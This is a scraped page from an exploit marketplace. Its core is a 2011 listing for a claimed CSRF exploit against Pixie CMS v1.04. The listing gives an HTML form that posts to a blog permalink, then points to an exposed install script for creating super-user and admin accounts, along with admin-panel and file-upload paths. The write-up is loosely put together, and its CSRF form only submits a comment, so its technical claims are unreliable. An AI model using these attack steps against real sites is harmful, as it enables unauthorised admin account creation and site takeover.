[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ piattaforma ]  [ pentest ]  [ cerca ]  [ faq ]  [ contatti ]  [ stile ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB Official Facebook
0day.today Exploit DB Official Twitter
0day.today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Il più grande database di exploit nel mondo.
Seleziona la tua lingua:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Cose che dovresti sapere du questo:

Utilizziamo un dominio principale DOMAIN_LINK

Se vuoi acquistare l'exploit o ottenerlo, devi comprare i Gold.
We accept currencies: [contact admin to find more]
           
Non vogliamo che utilizzi i tool di hacking per atttività illecite sul nostro sito web, quindi ogni azione può avere effetti illegali su utenti e sul nostro sito web verrai bannato. ed il tuo account con i tuoi dati verranno distrutti.

L'amministrazione del sito usa contatti ufficiali. Attenzione agli istruttori!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Sono un'utente registrato su 0day.today. Non voglio più vedere questa finestra in futuro.
Cosa fare prima?
  1. Leggere il [ accordo ]
  2. Leggere il [ Submit ] regole
  3. Visita il [ faq ] page
  4. [ Registrati ] profilo
  5. ottieni [ Oro ]
  6. Se vuoi [ vendere ]
  7. Se vuoi [ comprare ]
  8. se hai perso [ Account ]
  9. Qualsiasi domanda [ [email protected] ]


links principali


Ci puoi contattare tramite

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ Ripristina ]
Contattaci
Ci puoi contattare tramite:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today Exploits Market and 0day Exploits Database

Pixie v1.04 blog post CSRF

Autore
hackme
Rischio
[
Security Risk Unsored
]
0day-ID
0day-ID-17272
Categoria
web applications
Data inserimento
11-12-2011
Piattaforma
php
# Exploit Title: Pixie v1.04 blog post CSRF
# Google Dork: # Date: 11-Dec-2011
# Author: hackme
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
# Version: 1.04# Tested on: Linux Ubuntu 10.10
# CVE :
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
[+] Post Method
[+] exploit:
 
<form method="POST" action="http://127.0.0.1/pixie/?s=blog&m=permalink&x=my-first-post">
name: <input type="Text" name="name" id="name" size="15"/><br>
e-mail: <input type="Text" name="email" id="email" size="15"/>
<br>web(optional): <input type="Text" name="web" id="web" size="15"/><br>
comment: <input type="Text" name="comment" id="comment" size="15"/><br>
<input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/>
<input type="Hidden" name="post" id="post" value="1"/></form>

EXPLOIT :

http://site.com/admin/install/createuser.php

+ You can Creat :

- Super user
- Admin
- Client
- User

~ Admin Panel : http://site.com/admin/
~ Upload file : http://site.com/admin/?s=publish&x=filemanager 




#  0day.today [2024-07-02]  #
0day.today Exploit Database compra e vendi exploits (local, remote, DoS, PoC, etc.)
Sinviare tutte le richieste di mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team